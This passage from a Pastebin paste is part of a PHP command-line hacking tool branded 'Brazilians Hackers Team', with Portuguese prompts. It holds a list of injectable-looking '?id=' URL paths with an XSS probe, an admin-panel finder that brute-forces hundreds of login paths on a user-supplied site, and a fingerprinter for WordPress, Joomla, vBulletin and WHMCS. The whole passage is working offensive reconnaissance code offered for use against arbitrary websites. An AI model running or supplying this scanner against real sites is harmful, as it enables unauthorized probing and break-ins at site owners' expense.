  1401. "/main.php?id=",
  1402. "/review.php?id=",
  1403. "/chappies.php?id=",
  1404. "/read.php?id=",
  1405. "/prod_detail.php?id=",
  1406. "/viewphoto.php?id=",
  1407. "/article.php?id=",
  1408. "/person.php?id=",
  1409. "/productinfo.php?id=",
  1410. "/showimg.php?id=",
  1411. "/view.php?id=",
  1412. "/website.php?id=",
  1413. "/hosting_info.php?id=",
  1414. "/gallery.php?id=",
  1415. "/rub.php?idr=",
  1416. "/view_faq.php?id=",
  1417. "/artikelinfo.php?id=",
  1418. "/detail.php?ID=",
  1419. "/index.php?=",
  1420. "/profile_view.php?id=",
  1421. "/category.php?id=",
  1422. "/publications.php?id=",
  1423. "/fellows.php?id=",
  1424. "/downloads_info.php?id=",
  1425. "/prod_info.php?id=",
  1426. "/shop.php?do=,part&id=",
  1427. "/Productinfo.php?id=",
  1428. "/collectionitem.php?id=",
  1429. "/band_info.php?id=",
  1430. "/product.php?id=",
  1431. "/releases.php?id=",
  1432. "/ray.php?id=",
  1433. "/produit.php?id=",
  1434. "/pop.php?id=",
  1435. "/shopping.php?id=",
  1436. "/productdetail.php?id=",
  1437. "/post.php?id=",
  1438. "/viewshowdetail.php?id=",
  1439. "/clubpage.php?id=",
  1440. "/memberInfo.php?id=",
  1441. "/section.php?id=",
  1442. "/theme.php?id=",
  1443. "/page.php?id=",
  1444. "/shredder-categories.php?id=",
  1445. "/tradeCategory.php?id=",
  1446. "/product_ranges_view.php?ID=",
  1447. "/shop_category.php?id=",
  1448. "/transcript.php?id=",
  1449. "/channel_id=",
  1450. "/item_id=",
  1451. "/newsid=",
  1452. "/trainers.php?id=",
  1453. "/news-full.php?id=",
  1454. "/news_display.php?getid=",
  1455. "/index2.php?option=",
  1456. "/readnews.php?id=",
  1457. "/top10.php?cat=",
  1458. "/newsone.php?id=",
  1459. "/event.php?id=",
  1460. "/product-item.php?id=",
  1461. "/sql.php?id=",
  1462. "/aboutbook.php?id=",
  1463. "/review.php?id=",
  1464. "/loadpsb.php?id=",
  1465. "/ages.php?id=",
  1466. "/material.php?id=",
  1467. "/clanek.php4?id=",
  1468. "/announce.php?id=",
  1469. "/chappies.php?id=",
  1470. "/read.php?id=",
  1471. "/viewapp.php?id=",
  1472. "/viewphoto.php?id=",
  1473. "/rub.php?idr=",
  1474. "/galeri_info.php?l=",
  1475. "/review.php?id=",
  1476. "/iniziativa.php?in=",
  1477. "/curriculum.php?id=",
  1478. "/labels.php?id=",
  1479. "/look.php?ID=",
  1480. "/newsone.php?id=",
  1481. "/aboutbook.php?id=",
  1482. "/material.php?id=",
  1483. "/opinions.php?id=",
  1484. "/announce.php?id=",
  1485. "/rub.php?idr=",
  1486. "/galeri_info.php?l=",
  1487. "/tekst.php?idt=",
  1488. "/newscat.php?id=",
  1489. "/newsticker_info.php?idn=",
  1490. "/rubrika.php?idr=",
  1491. "/rubp.php?idr=",
  1492. "/offer.php?idf=",
  1493. "/art.php?idm=",
  1494. "/title.php?id=",
  1495. "/db.php?path_local=",
  1496. "/principal.php?conteudo=",
  1497. "/main.php?site=",
  1498. "/template.php?pagina=",
  1499. "/contenido.php?sec=",
  1500. "/index_principal.php?pagina=",
  1501. "/template.php?name=",
  1502. "/forum.php?act=",
  1503. "/home.php?action=",
  1504. "/home.php?pagina=",
  1505. "/noticias.php?arq=",
  1506. "/main.php?x=",
  1507. "/main.php?page=",
  1508. "/default.php?page=",
  1509. "/search.php?id=1<script>alert(21)</script>");
  1510. foreach($dangpath as $papa){
  1511. $houwari="$gnsc/$papa";
  1512. $fati=get_headers($houwari);
  1513. $lambilonce=preg_match("/404/",$fati[0]);
  1514. if(!$lambilonce){
  1515.  
  1516. echo "Encontrado \n";
  1517. echo"$houwari\n";
  1518.  
  1519. }
  1520. }
  1521.  
  1522.  
  1523.  
  1524. }
  1525. /////////////////////////////////////////////////////////////////////////////////////////////////////////
  1526. if($id == 4){
  1527. echo "
  1528. +#############################+
  1529. # #
  1530. # *** Brazilians Hackers Team #
  1531. # #
  1532. +#############################+
  1533. *******************************
  1534. ******ADMIN PAINEL FINDER******
  1535. *******************************
  1536. Comando http://
  1537.  
  1538. *******************************\n\n";
  1539. echo"Entre Com Seu Site ===>";
  1540. $adminpanel=trim(fgets(STDIN,1024));
  1541. $nhy=array(
  1542. "admin.asp",
  1543. "login.asp",
  1544. "admin/account.asp",
  1545. "admin/login.asp",
  1546. "admin/login.asp",
  1547. "admin/home.asp",
  1548. "admin/controlpanel.asp",
  1549. "admin/cp.asp",
  1550. "admin/adminLogin.asp",
  1551. "admin/admin_login.asp",
  1552. "admin/controlpanel.asp",
  1553. "admin/admin-login.asp",
  1554. "admin-login.asp",
  1555. "admin/account.asp",
  1556. "admin/admin.asp",
  1557. "admin.asp",
  1558. "adminitem.asp",
  1559. "adminitems.asp",
  1560. "administrator/login.asp",
  1561. "administrator.asp",
  1562. "administration.asp",
  1563. "adminLogin/",
  1564. "adminlogin.asp",
  1565. "admin_area/admin.asp",
  1566. "admin_area/login.asp",
  1567. "manager.asp",
  1568. "letmein.asp",
  1569. "admin.php",
  1570. "login.php",
  1571. "login.php",
  1572. "login/",
  1573. "login.php",
  1574. "adm/",
  1575. "admin/",
  1576. "admin/account.php",
  1577. "admin/login.php",
  1578. "admin/login.php",
  1579. "admin/home.php",
  1580. "admin/controlpanel.php",
  1581. "admin/controlpanel.php",
  1582. "admin/cp.php",
  1583. "admin/adminLogin.php",
  1584. "admin/adminLogin.php",
  1585. "admin/admin_login.php",
  1586. "admin/controlpanel.php",
  1587. "admin/admin-login.php",
  1588. "admin-login.php",
  1589. "admin/account.php",
  1590. "admin/admin.php",
  1591. "admin.php",
  1592. "admin.php",
  1593. "adminitem/",
  1594. "adminitem.php",
  1595. "adminitems/",
  1596. "adminitems.php",
  1597. "administrator/",
  1598. "administrator/",
  1599. "administrator.php",
  1600. "administration/",
  1601. "administration.php",
  1602. "adminLogin/",
  1603. "adminlogin.php",
  1604. "admin_area/admin.php",
  1605. "admin_area/",
  1606. "admin_area/login.php",
  1607. "manager/",
  1608. "manager.php",
  1609. "letmein/",
  1610. "letmein.php",
  1611. "superuser/",
  1612. "superuser.php",
  1613. "access/",
  1614. "access.php",
  1615. "sysadm/",
  1616. "sysadm.php",
  1617. "superman/",
  1618. "supervisor/",
  1619. "panel.php",
  1620. "control/",
  1621. "control.php",
  1622. "member/",
  1623. "member.php",
  1624. "members/",
  1625. "members.php",
  1626. "user/",
  1627. "user.php",
  1628. "cp/",
  1629. "uvpanel/",
  1630. "manage/",
  1631. "manage.php",
  1632. "management/",
  1633. "management.php",
  1634. "signin/",
  1635. "signin.php",
  1636. "log-in/",
  1637. "log-in.php",
  1638. "log_in/",
  1639. "log_in.php",
  1640. "sign_in/",
  1641. "sign_in.php",
  1642. "sign-in/",
  1643. "sign-in.php",
  1644. "users/",
  1645. "users.php",
  1646. "accounts/",
  1647. "accounts.php",
  1648. "wp-login.php",
  1649. "bb-admin/login.php",
  1650. "bb-admin/admin.php",
  1651. "bb-admin/admin.php",
  1652. "administrator/account.php",
  1653. "relogin.php",
  1654. "relogin.php",
  1655. "check.php",
  1656. "relogin.php",
  1657. "blog/wp-login.php",
  1658. "user/admin.php",
  1659. "users/admin.php",
  1660. "registration/",
  1661. "processlogin.php",
  1662. "checklogin.php",
  1663. "checkuser.php",
  1664. "checkadmin.php",
  1665. "isadmin.php",
  1666. "authenticate.php",
  1667. "authentication.php",
  1668. "auth.php",
  1669. "authuser.php",
  1670. "authadmin.php",
  1671. "cp.php",
  1672. "modelsearch/",
  1673. "moderator.php",
  1674. "moderator/",
  1675. "controlpanel/",
  1676. "controlpanel.php",
  1677. "admincontrol.php",
  1678. "adminpanel.php",
  1679. "fileadmin/",
  1680. "fileadmin.php",
  1681. "sysadmin.php",
  1682. "admin1.php",
  1683. "admin1.php" ,
  1684. "admin1.php",
  1685. "admin2.php",
  1686. "admin2.php",
  1687. "yonetim.php",
  1688. "yonetim.php",
  1689. "yonetici.php",
  1690. "yonetici.php",
  1691. "phpmyadmin/",
  1692. "myadmin/",
  1693. "ur-admin.php",
  1694. "ur-admin/",
  1695. "Server.php",
  1696. "Server/",
  1697. "wp-admin/",
  1698. "administr8.php",
  1699. "administr8/",
  1700. "webadmin/",
  1701. "webadmin.php",
  1702. "administratie/",
  1703. "admins/",
  1704. "admins.php",
  1705. "administrivia/",
  1706. "Database_Administration/",
  1707. "useradmin/",
  1708. "sysadmins/",
  1709. "admin1/",
  1710. "system-administration/",
  1711. "administrators/",
  1712. "pgadmin/",
  1713. "directadmin/",
  1714. "staradmin/",
  1715. "ServerAdministrator/",
  1716. "SysAdmin/",
  1717. "administer/",
  1718. "LiveUser_Admin/",
  1719. "sys-admin/",
  1720. "typo3/",
  1721. "panel/",
  1722. "cpanel/",
  1723. "cpanel_file/",
  1724. "platz_login/",
  1725. "rcLogin/",
  1726. "blogindex/",
  1727. "formslogin/",
  1728. "autologin/",
  1729. "support_login/",
  1730. "meta_login/",
  1731. "manuallogin/",
  1732. "simpleLogin/",
  1733. "loginflat/",
  1734. "utility_login/",
  1735. "showlogin/",
  1736. "memlogin/",
  1737. "login-redirect/",
  1738. "sub-login/",
  1739. "wp-login/",
  1740. "login1/",
  1741. "dir-login/",
  1742. "login_db/",
  1743. "xlogin/",
  1744. "smblogin/",
  1745. "customer_login/",
  1746. "UserLogin/",
  1747. "login-us/",
  1748. "acct_login/",
  1749. "bigadmin/",
  1750. "project-admins/",
  1751. "phppgadmin/",
  1752. "pureadmin/",
  1753. "sql-admin/",
  1754. "radmind/",
  1755. "openvpnadmin/",
  1756. "wizmysqladmin/",
  1757. "vadmind/",
  1758. "ezsqliteadmin/",
  1759. "hpwebjetadmin/",
  1760. "newsadmin/",
  1761. "adminpro/",
  1762. "Lotus_Domino_Admin/",
  1763. "bbadmin/",
  1764. "vmailadmin/",
  1765. "Indy_admin/",
  1766. "ccp14admin/",
  1767. "irc-macadmin/",
  1768. "banneradmin/",
  1769. "sshadmin/",
  1770. "phpldapadmin/",
  1771. "macadmin/",
  1772. "administratoraccounts/",
  1773. "admin4_account/",
  1774. "admin4_colon/",
  1775. "radmind-1/",
  1776. "Super-Admin/",
  1777. "AdminTools/",
  1778. "cmsadmin/",
  1779. "SysAdmin2/",
  1780. "globes_admin/",
  1781. "cadmins/",
  1782. "phpSQLiteAdmin/",
  1783. "navSiteAdmin/",
  1784. "server_admin_small/",
  1785. "logo_sysadmin/",
  1786. "power_user/",
  1787. "system_administration/",
  1788. "ss_vms_admin_sm/",
  1789. "bb-admin/",
  1790. "panel-administracion/",
  1791. "instadmin/",
  1792. "memberadmin/",
  1793. "administratorlogin/",
  1794. "adm.php",
  1795. "admin_login.php",
  1796. "panel-administracion/login.php",
  1797. "pages/admin/admin-login.php",
  1798. "pages/admin/",
  1799. "acceso.php",
  1800. "admincp/login.php",
  1801. "admincp/",
  1802. "adminarea/",
  1803. "admincontrol/",
  1804. "affiliate.php",
  1805. "adm_auth.php",
  1806. "memberadmin.php",
  1807. "administratorlogin.php",
  1808. "modulesadmin/",
  1809. "administrators.php",
  1810. "siteadmin/",
  1811. "siteadmin.php",
  1812. "adminsite/",
  1813. "kpanel/",
  1814. "vorod/",
  1815. "vorod.php",
  1816. "vorud/",
  1817. "vorud.php",
  1818. "adminpanel/",
  1819. "PSUser/",
  1820. "secure/",
  1821. "webmaster/",
  1822. "webmaster.php",
  1823. "autologin.php",
  1824. "userlogin.php",
  1825. "admin_area.php",
  1826. "cmsadmin.php",
  1827. "security/",
  1828. "usr/",
  1829. "root/",
  1830. "secret/",
  1831. "admin/login.php",
  1832. "admin/adminLogin.php",
  1833. "moderator.php",
  1834. "moderator.php",
  1835. "moderator/login.php",
  1836. "moderator/admin.php",
  1837. "yonetici.php",
  1838. "0admin/",
  1839. "0manager/",
  1840. "aadmin/",
  1841. "cgi-bin/login",
  1842. "login1",
  1843. "login_admin/",
  1844. "login_admin",
  1845. "login_out/",
  1846. "login_out",
  1847. "login_user",
  1848. "loginerror/",
  1849. "loginok/",
  1850. "loginsave/",
  1851. "loginsuper/",
  1852. "loginsuper",
  1853. "login",
  1854. "logout/",
  1855. "logout",
  1856. "secrets/",
  1857. "super1/",
  1858. "super1",
  1859. "super_index",
  1860. "super_login",
  1861. "supermanager",
  1862. "superman/",
  1863. "superuser/",
  1864. "supervise/",
  1865. "supervise/",
  1866. "super/",
  1867. );
  1868. foreach($nhy as $noip) {
  1869. $noipno="$adminpanel/$noip";
  1870. $lyzi= get_headers($noipno);
  1871. $ilovesleep=preg_match("/404/",$lyzi[0]);
  1872. if(!$ilovesleep){
  1873. echo"\nEncontrado\n$noipno\n";
  1874. }
  1875.  
  1876.  
  1877.  
  1878. }
  1879. }
  1880. if($id == 5){
  1881. echo"
  1882. +#############################+
  1883. # #
  1884. # *** Brazilians Hackers Team #
  1885. # #
  1886. +#############################+
  1887. *******************************
  1888. *** Check O Tipo De Script ***
  1889. ***** WordPress E Joomla *****
  1890. ***********************************\n
  1891. ";
  1892. echo"Entre Com Seu Site http//\n======>";
  1893. $typesite=trim(fgets(STDIN,1024));
  1894. //////////shek if hi is wordpress
  1895. if($typesite) {
  1896. $wordpress1=array(
  1897. "/wp-settings.php");
  1898. foreach ($wordpress1 as $word11){
  1899. $alltypewp="$typesite/$word11";
  1900. $yehhh=@file_get_contents($alltypewp);
  1901. if ($yehhh)
  1902. {
  1903. echo"\n Esse Site Usa ======> wordpress";
  1904. }
  1905.  
  1906. }
  1907. ////////////joomla chek
  1908. $najnzopza=array(
  1909. "/templates/beez5/css/beez5.css",
  1910. "/components/com_content/metadata.xml",);
  1911. foreach($najnzopza as $niuo){
  1912. $alltypejoomla="$typesite/$niuo";
  1913. $lkaxi=@file_get_contents($alltypejoomla);
  1914. if($lkaxi){
  1915.  
  1916. echo "\n Esse Site Usa =====> joomla";
  1917. }
  1918.  
  1919. }
  1920. }
  1921. /////////vBulletin
  1922. $vBulletin=@file_get_contents("$typesite/clientscript/vbulletin_ajax_imagereg.js");
  1923. if($vBulletin){
  1924. echo"Esse Site Usa vBulletin";
  1925. }
  1926. ////////whmc
  1927. $whmc=@file_get_contents("$typesite/templates/classic/style.css");
  1928. if($whmc){
  1929. echo "Esse Site Usa whmcs";
  1930.  
  1931. }
  1932.  
  1933.  
  1934.  
  1935. }
  1936.  
  1937.  
  1938.  
  1939.  
  1940.  
  1941.  
  1942. }else{
  1943. echo "Senha Invalida";
  1944. }
  1945. ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!